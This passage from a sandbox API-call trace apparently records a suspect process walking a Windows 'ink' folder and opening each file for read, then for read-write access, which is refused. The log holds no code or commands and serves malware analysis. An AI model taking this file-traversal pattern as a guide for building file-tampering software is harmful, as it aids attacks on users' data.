cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\ru-RU", lpUsedDefaultChar=0x0) returned 57 [0085.627] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53718 [0085.628] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0085.628] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0085.628] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf70 [0085.628] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cee0 [0085.628] AreFileApisANSI () returned 1 [0085.628] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53718, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 57 [0085.628] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x72) returned 0x69bb0 [0085.628] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53718, cbMultiByte=-1, lpWideCharStr=0x69bb0, cchWideChar=57 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\ru-RU") returned 57 [0085.628] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\ru-RU" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ru-ru"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0085.628] GetLastError () returned 0x5 [0085.628] GetLastError () returned 0x5 [0085.628] SetLastError (dwErrCode=0x5) [0085.628] GetLastError () returned 0x5 [0085.628] SetLastError (dwErrCode=0x5) [0085.628] GetLastError () returned 0x5 [0085.628] SetLastError (dwErrCode=0x5) [0085.628] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x69bb0 | out: hHeap=0x20000) returned 1 [0085.628] AreFileApisANSI () returned 1 [0085.628] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53718, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 57 [0085.628] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x72) returned 0x69db0 [0085.628] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53718, cbMultiByte=-1, lpWideCharStr=0x69db0, cchWideChar=57 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\ru-RU") returned 57 [0085.629] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\ru-RU" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ru-ru"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0085.629] GetLastError () returned 0x5 [0085.629] GetLastError () returned 0x5 [0085.629] SetLastError (dwErrCode=0x5) [0085.629] GetLastError () returned 0x5 [0085.629] SetLastError (dwErrCode=0x5) [0085.629] GetLastError () returned 0x5 [0085.629] SetLastError (dwErrCode=0x5) [0085.629] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x69db0 | out: hHeap=0x20000) returned 1 [0085.629] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cee0 | out: hHeap=0x20000) returned 1 [0085.629] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf70 | out: hHeap=0x20000) returned 1 [0085.629] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53718 | out: hHeap=0x20000) returned 1 [0085.629] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0085.629] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0085.629] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0085.629] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0085.629] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75dc8 [0085.629] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa6) returned 0x5fd18 [0085.629] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75dc8 | out: hHeap=0x20000) returned 1 [0085.629] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6e2d8 [0085.629] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5fd18 | out: hHeap=0x20000) returned 1 [0085.629] FindNextFileW (in: hFindFile=0x78150, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7d126e12, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0xe46546cb, ftLastAccessTime.dwHighDateTime=0x1d2a058, ftLastWriteTime.dwLowDateTime=0xe46546cb, ftLastWriteTime.dwHighDateTime=0x1d2a058, nFileSizeHigh=0x0, nFileSizeLow=0xb3200, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="ShapeCollector.exe", cAlternateFileName="")) returned 1 [0085.629] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0085.629] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e2d0 [0085.629] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0085.629] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e0d8 [0085.629] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e420 [0085.629] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e228 [0085.629] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e420 | out: hHeap=0x20000) returned 1 [0085.629] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e0d8 | out: hHeap=0x20000) returned 1 [0085.629] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e2d0 | out: hHeap=0x20000) returned 1 [0085.629] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e228 | out: hHeap=0x20000) returned 1 [0085.629] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d040 [0085.629] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5c940 [0085.630] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6eb58 [0085.630] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6df20 [0085.630] FindFirstFileExW (in: lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\ru-RU\\*", fInfoLevelId=0x0, lpFindFileData=0x313ef40, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x0 | out: lpFindFileData=0x313ef40) returned 0x78e50 [0085.630] FindNextFileW (in: hFindFile=0x78e50, lpFindFileData=0x313ecc4 | out: lpFindFileData=0x313ecc4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17b8a1d2, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xa080e4d1, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x1a3c699c, ftLastWriteTime.dwHighDateTime=0x1d2a02b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0085.630] FindNextFileW (in: hFindFile=0x78e50, lpFindFileData=0x313ecc4 | out: lpFindFileData=0x313ecc4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3e3af7a2, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0x3e3af7a2, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0x3e3af7a2, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0x2800, dwReserved0=0x0, dwReserved1=0x0, cFileName="tipresx.dll.mui", cAlternateFileName="")) returned 1 [0085.630] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6df20 | out: hHeap=0x20000) returned 1 [0085.630] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0085.630] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88680 [0085.630] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0085.630] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0085.630] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0085.630] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88680 | out: hHeap=0x20000) returned 1 [0085.630] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0085.630] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0085.630] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0085.630] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6ea48 [0085.630] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x68) returned 0x46ba8 [0085.630] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6e2d8 | out: hHeap=0x20000) returned 1 [0085.630] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d0a0 [0085.630] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cf40 [0085.630] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d0a0 | out: hHeap=0x20000) returned 1 [0085.630] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cf40 | out: hHeap=0x20000) returned 1 [0085.630] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d050 [0085.630] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cf40 [0085.630] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d050 | out: hHeap=0x20000) returned 1 [0085.630] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cf40 | out: hHeap=0x20000) returned 1 [0085.630] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0085.630] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6df20 [0085.630] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0085.630] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xbe) returned 0x55f20 [0085.631] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6df20 | out: hHeap=0x20000) returned 1 [0085.631] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0085.631] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa0) returned 0x50cf8 [0085.631] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x55f20 | out: hHeap=0x20000) returned 1 [0085.631] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0085.631] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0085.631] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0085.631] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0085.631] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x50cf8 | out: hHeap=0x20000) returned 1 [0085.631] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0085.631] AreFileApisANSI () returned 1 [0085.631] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\ru-RU\\tipresx.dll.mui", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\ru-RU\\tipresx.dll.mui", lpUsedDefaultChar=0x0) returned 73 [0085.631] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d210 [0085.631] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0085.631] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0085.631] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d050 [0085.631] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf70 [0085.631] AreFileApisANSI () returned 1 [0085.631] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d210, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 73 [0085.631] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x92) returned 0x85120 [0085.631] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d210, cbMultiByte=-1, lpWideCharStr=0x85120, cchWideChar=73 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\ru-RU\\tipresx.dll.mui") returned 73 [0085.631] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\ru-RU\\tipresx.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ru-ru\\tipresx.dll.mui"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x360 [0085.631] GetFileType (hFile=0x360) returned 0x1 [0085.632] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x85120 | out: hHeap=0x20000) returned 1 [0085.632] SetFilePointerEx (in: hFile=0x360, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0085.632] SetFilePointerEx (in: hFile=0x360, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0085.632] SetFilePointerEx (in: hFile=0x360, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0085.634] CloseHandle (hObject=0x360) returned 1 [0085.634] AreFileApisANSI () returned 1 [0085.634] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d210, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 73 [0085.634] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x92) returned 0x85a80 [0085.634] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d210, cbMultiByte=-1, lpWideCharStr=0x85a80, cchWideChar=73 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\ru-RU\\tipresx.dll.mui") returned 73 [0085.634] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\ru-RU\\tipresx.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ru-ru\\tipresx.dll.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0085.634] GetLastError () returned 0x5 [0085.634] GetLastError () returned 0x5 [0085.634] SetLastError (dwErrCode=0x5) [0085.635] GetLastError () returned 0x5 [0085.635] SetLastError (dwErrCode=0x5) [0085.635] GetLastError () returned 0x5 [0085.635] SetLastError (dwErrCode=0x5) [0085.635] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x85a80 | out: hHeap=0x20000) returned 1 [0085.635] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf70 | out: hHeap=0x20000) returned 1 [0085.635] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d050 | out: hHeap=0x20000) returned 1 [0085.635] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d210 | out: hHeap=0x20000) returned 1 [0085.635] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0085.635] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0085.635] FindNextFileW (in: hFindFile=0x78e50, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x313f498, ftCreationTime.dwHighDateTime=0x90, ftLastAccessTime.dwLowDateTime=0x313f420, ftLastAccessTime.dwHighDateTime=0x77892b2c, ftLastWriteTime.dwLowDateTime=0x50d00, ftLastWriteTime.dwHighDateTime=0x313f210, nFileSizeHigh=0x90, nFileSizeLow=0x0, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="t ", cAlternateFileName="渘Ĉ㪀ā湈Ĉ̓⠀")) returned 0 [0085.635] FindClose (in: hFindFile=0x78e50 | out: hFindFile=0x78e50) returned 1 [0085.635] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf90 [0085.635] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cf40 [0085.635] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf90 | out: hHeap=0x20000) returned 1 [0085.635] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cf40 | out: hHeap=0x20000) returned 1 [0085.635] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6ea48 | out: hHeap=0x20000) returned 1 [0085.635] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0085.635] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6eb58 | out: hHeap=0x20000) returned 1 [0085.635] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d040 | out: hHeap=0x20000) returned 1 [0085.635] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5c940 | out: hHeap=0x20000) returned 1 [0085.635] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x46ba8 | out: hHeap=0x20000) returned 1 [0085.635] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d040 [0085.635] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5c940 [0085.635] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d040 | out: hHeap=0x20000) returned 1 [0085.635] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5c940 | out: hHeap=0x20000) returned 1 [0085.635] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf70 [0085.635] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5c940 [0085.635] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf70 | out: hHeap=0x20000) returned 1 [0085.636] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5c940 | out: hHeap=0x20000) returned 1 [0085.636] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dfc0 [0085.636] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x76278 [0085.636] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e1b8 [0085.636] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa6) returned 0x5f428 [0085.636] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x76278 | out: hHeap=0x20000) returned 1 [0085.636] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e1b8 | out: hHeap=0x20000) returned 1 [0085.636] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x90) returned 0x8ac50 [0085.636] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5f428 | out: hHeap=0x20000) returned 1 [0085.636] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0085.636] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0085.636] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0085.636] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0085.636] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8ac50 | out: hHeap=0x20000) returned 1 [0085.636] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dfc0 | out: hHeap=0x20000) returned 1 [0085.636] AreFileApisANSI () returned 1 [0085.636] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\ShapeCollector.exe", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\ShapeCollector.exe", lpUsedDefaultChar=0x0) returned 70 [0085.636] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6cdf0 [0085.636] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0085.636] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0085.636] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf70 [0085.636] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d040 [0085.636] AreFileApisANSI () returned 1 [0085.636] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6cdf0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 70 [0085.636] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8c) returned 0x8a238 [0085.636] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6cdf0, cbMultiByte=-1, lpWideCharStr=0x8a238, cchWideChar=70 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\ShapeCollector.exe") returned 70 [0085.636] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\ShapeCollector.exe" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\shapecollector.exe"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x35c [0085.637] GetFileType (hFile=0x35c) returned 0x1 [0085.637] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8a238 | out: hHeap=0x20000) returned 1 [0085.638] SetFilePointerEx (in: hFile=0x35c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0085.638] SetFilePointerEx (in: hFile=0x35c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0085.638] SetFilePointerEx (in: hFile=0x35c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0085.638] CloseHandle (hObject=0x35c) returned 1 [0085.638] AreFileApisANSI () returned 1 [0085.638] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6cdf0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 70 [0085.638] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8c) returned 0x8a2d0 [0085.638] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6cdf0, cbMultiByte=-1, lpWideCharStr=0x8a2d0, cchWideChar=70 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\ShapeCollector.exe") returned 70 [0085.638] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\ShapeCollector.exe" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\shapecollector.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0085.638] GetLastError () returned 0x5 [0085.638] GetLastError () returned 0x5 [0085.638] SetLastError (dwErrCode=0x5) [0085.639] GetLastError () returned 0x5 [0085.639] SetLastError (dwErrCode=0x5) [0085.639] GetLastError () returned 0x5 [0085.639] SetLastError (dwErrCode=0x5) [0085.639] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8a2d0 | out: hHeap=0x20000) returned 1 [0085.639] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d040 | out: hHeap=0x20000) returned 1 [0085.639] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf70 | out: hHeap=0x20000) returned 1 [0085.639] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6cdf0 | out: hHeap=0x20000) returned 1 [0085.639] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0085.639] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0085.639] FindNextFileW (in: hFindFile=0x78150, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17b8a1d2, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xa080e8a3, ftLastAccessTime.dwHighDateTime=0x1d47ca3, 